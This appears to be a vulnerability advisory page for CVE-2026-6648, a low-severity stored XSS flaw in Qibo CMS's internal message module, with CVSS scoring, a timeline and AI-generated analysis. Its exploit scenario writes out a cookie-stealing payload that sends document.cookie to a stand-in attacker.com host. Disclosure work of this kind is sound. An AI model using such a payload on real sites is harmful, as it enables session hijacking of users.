
Qibo CMS CVE-2026-6648

EUVD-2026-23844 · LOW
Cross-site Scripting (XSS) (CWE-79)
Published 2026-04-20 · Sources: VulDB, GHSA-7hc9-pw4r-x45r
Score: 2.0 (CVSS 4.0, NVD)

Severity by source

NVD (primary): 2.0 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD; NVD is the only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network (N)
Attack Complexity: Low (L)
Privileges Required: Low (L)
User Interaction: Passive (P)
Scope: Not defined (X); CVSS 4.0 has no Scope metric

Lifecycle Timeline (9 events)

  • Apr 29, 2026 01:12 (NVD): Severity changed, MEDIUM → LOW
  • Apr 29, 2026 01:12 (NVD): CVSS changed, 5.1 (MEDIUM) → 2.0 (LOW)
  • Apr 29, 2026 01:00 (vuln.today): PoC detected, public exploit code
  • Apr 20, 2026 13:30 (vuln.today): Analysis generated
  • Apr 20, 2026 13:22 (NVD): Severity changed, LOW → MEDIUM
  • Apr 20, 2026 13:22 (NVD): CVSS changed, 3.5 (LOW) → 5.1 (MEDIUM)
  • Apr 20, 2026 13:15 (euvd): EUVD ID assigned, EUVD-2026-23844
  • Apr 20, 2026 13:15 (vuln.today): Analysis generated
  • Apr 20, 2026 13:00 (nvd): CVE published, LOW 2.0

Description (CVE.org)

A vulnerability was found in Qibo CMS 1.0. Affected by this vulnerability is an unknown functionality of the component Internal Message Module. Performing a manipulation results in cross-site scripting. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

Analysis (AI-generated)

Cross-site scripting (XSS) in Qibo CMS 1.0 Internal Message Module allows authenticated remote attackers to inject malicious scripts through message manipulation, affecting user sessions and data integrity. The vulnerability requires user interaction (UI:P) and valid authentication (PR:L), limiting exposure to authenticated users. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

  • Access: Attacker gains authenticated access
  • Delivery: Crafts XSS payload in message content
  • Exploit: Sends/stores malicious message
  • Execution: Target user opens Internal Message Module
  • Persist: Browser executes embedded script
  • Impact: Attacker steals session or performs unauthorized action

Vulnerability Assessment (AI-generated)

Exploitation: Exploitation requires three specific, concrete conditions: (1) the attacker must possess a valid authenticated account (a low-privilege user is sufficient, per PR:L in the CVSS vector) on the Qibo CMS 1.0 instance; (2) the target user must actively visit and view a message containing the injected payload within the Internal Message Module, which is the user interaction requirement (UI:P); (3) the target's browser must have JavaScript enabled and not be protected by a restrictive Content Security Policy. …

Risk Assessment: Risk assessment reveals a moderate but manageable threat. …

Exploit Scenario: An authenticated Qibo CMS user receives a message from an attacker containing embedded JavaScript (e.g., <img src=x onerror='fetch(attacker.com/steal?cookie='+document.cookie)'>). When the user views the Internal Message Module to read this message, the browser executes the embedded script, exfiltrating the user's session cookie to the attacker's server. …

Remediation: No vendor-released patch has been identified at the time of analysis, likely because the vendor did not respond to the disclosure. …



CVE-2026-6648 vulnerability details – vuln.today
